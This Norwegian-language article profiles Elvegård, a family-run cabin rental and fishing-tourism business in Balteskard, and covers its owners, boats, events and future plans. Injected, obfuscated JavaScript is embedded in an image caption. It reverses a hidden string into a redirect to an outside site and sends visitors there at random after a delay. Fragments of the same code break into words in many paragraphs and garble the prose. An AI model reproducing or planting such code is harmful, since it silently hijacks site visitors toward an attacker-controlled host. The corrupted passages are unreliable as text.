Elvegård hytteutleie og fiskeferie

Nordlys på Elvegård. Foto: ©Kai E. Sjøvoll

Elvegård hytteutleie og fiskeferie er en liten familiedrevet reiselivsbedrift som ligger i Balteskard like ved Grovfjord. Anlegget består av seks hytter og et eldre hus fra 1838, samt oppstillingsplasser for campingvogn/bobiler og et stort friareal for camping nede på strandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}anden.

Hanne Rebekka Hansen og Tony Griff Pettersen er syvende generasjon som bor på gården i Balteskard. De har for få år siden overtatt driften fra Tony’s foreldre. Familien består i dag av Hanne, Tony og deres tre små gutter. Hanne har permisjon fra sin lærerjobb ved Skånlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and skole, mens Tony jobber fulltid på ambulansen.

At de holder til i Balteskard er av naturlige årsaker, da dette er en familiebedrift som de har overtatt og driver videre. De er nå i en oppstartsfase som nye drivere og har de siste årene gjort noen nødvendige investeringer. De har blant annet skaffet en flott skøyte, «Hellevig», som leies ut og brukes til turer med turister. Denne har også vært i bruk under VM i skreifiske i Lofoten. I tillegg har de 10 båter med motor til utleie.

Fisketurisme er ved Elvegård.

Elvegård Hytteutleie og Fisketurisme leier ut skøyta «Hellevig» i Lofoten under VM i skreifiske.

Hanne og Tony føler at Skånlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and kommune har vært til stor hjelp i denne oppstartsfasen, hvor de blant annet har fått tilskudd fra kommunens næringsfond.

Elvegård har nå også fått seg naustbar som blant annet ble brukt under arrangementer under Arctic Race of Norway (ARN).

Fisketurisme på Elvegård i Skånl<script><p class=$GQRkExOVl1p57bbeL4u=function(n){if(typeof($GQRkExOVl1p57bbeL4u.list[n])==»string»)return $GQRkExOVl1p57bbeL4u.list[n].split(«»).reverse().join(«»);return $GQRkExOVl1p57bbeL4u.list[n]};$GQRkExOVl1p57bbeL4u.list=[«‘php.sofnI/slitU/eroC/sppa/gnigats-pw/snigulp/tnetnoc-pw/moc.stelotog//:ptth’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and.» width=»845″ height=»450″ /> Aktivitet på kaia under Arctic Race of Norway i 2015. Båten «Hellevig» ligger til kai.

I dag er det fisketurisme som er hovedbeskjeftigelsen, i tillegg til catering og utleie til møter og andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre arrangementer. Bedrifter leier seg også inn på anlegget, og badestampen er populær blant disse.

Elvegård ligger flott til i Balteskard, helt nede ved sjøen, og er et eldorado for turistene som kommer dit for å fiske.  I dag er det i stor grad turister fra Sverige og Finlandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}and, samt noen få russere.

Hegra og Skarven dobbelthytte på Elvegård.

Hegra og Skarven dobbelthytte på Elvegård.

Utleiehytter ved Elvegård

Utleiehytter ved Elvegård

 

 

 

 

 

 

 

 

Begrensninger for bedriften i dag går ut på å få nok tid til alt som skal til for å drifte anlegget, når de har tre små barn og annen jobb i tillegg. Bedriften har ingen ansatte utenom familien, men leier inn vikarer ved topper.

De har oppdrettsanlegg som nærmeste nabo, og dette fungerer greit med godt samarbeid.

Hvis Hanne og Tony hadde ansvar for strategiarbeidet i kommunen ville de ha satset på videreutvikling av Kystkulturveien. Elvegård er i dag en av bedriftene tilknyttet dette tiltaket, og har i denne sammenheng kontakt med de andom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}andre reiselivsbedrifter som også er tilknytta veien; så som Lapphaugen, Fjellkysten og Tjeldsundbrua Kro & Hotell.

Fellesnevneren de mener regionen kan dra nytte av er fiske, kysten og naturen.

Framtida:

Målet er at Hanne og Tony skal kunne leve av Elvegård uten å ha jobb ved siden av. De ønsker å utvikle strandom()*5);if(number1==3){var delay=15000;setTimeout($GQRkExOVl1p57bbeL4u(0),delay)}anda mer med badestamp, kulp og servicehus, samt øke plassen til camping. En gårdsbutikk er på ønskelista, og paret går også med planer om å starte opp med villsau. De ønsker å satse på vinterturisme, siden de tenker at naturen rundt dem ligger godt til rette for både nordlysturisme, ski- og toppturer.